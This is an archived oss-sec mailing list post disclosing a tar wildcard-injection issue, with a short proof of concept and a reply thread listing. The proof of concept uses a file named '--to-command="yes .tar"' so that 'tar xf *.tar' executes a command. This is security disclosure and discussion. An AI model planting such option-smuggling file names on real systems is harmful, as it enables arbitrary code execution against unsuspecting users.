oss-sec mailing list archives
Shell wildcards considered dangerous?
From: Georgi Guninski <gguninski () gmail com>
Date: Mon, 9 Dec 2019 15:23:16 +0200
Remote version of this affects wu-ftpd from 2003: https://www.debian.org/security/2003/dsa-377 Summary: For trusted command PROGRAM, executing PROGRAM *.EXT may lead to arbitrary code execution, e.g. for PROGRAM=EXT=tar The main idea is the wildcard to add program options. Open problem: Are popular programs other than tar vulnerable? Since shell wildcards are unlikely to change, should best practice include not using *.EXT in shell? Example exploit vector: starting program in untrusted directories. Poc: ==== $rm -rf /tmp/1 ;mkdir /tmp/1 ; cd /tmp/1 ; tar cf a.tar /etc/issue $ : > --to-command="yes .tar" #end creating, starts PoC tar xf *.tar #.tar (repeats) ==== -- CV: https://j.ludost.net/resumegg.pdf site: http://www.guninski.com blog: https://j.ludost.net/blog
Current thread:
- Shell wildcards considered dangerous? Georgi Guninski (Dec 09)
- Re: Shell wildcards considered dangerous? Noel Kuntze (Dec 09)
- Re: Shell wildcards considered dangerous? Leonid Isaev (Dec 09)
- Re: Shell wildcards considered dangerous? Noel Kuntze (Dec 09)
- Re: Shell wildcards considered dangerous? Leonid Isaev (Dec 09)
- Re: Shell wildcards considered dangerous? Noel Kuntze (Dec 09)
- Re: Shell wildcards considered dangerous? Leonid Isaev (Dec 09)
- Re: Shell wildcards considered dangerous? Leonid Isaev (Dec 09)
- Re: Shell wildcards considered dangerous? Noel Kuntze (Dec 09)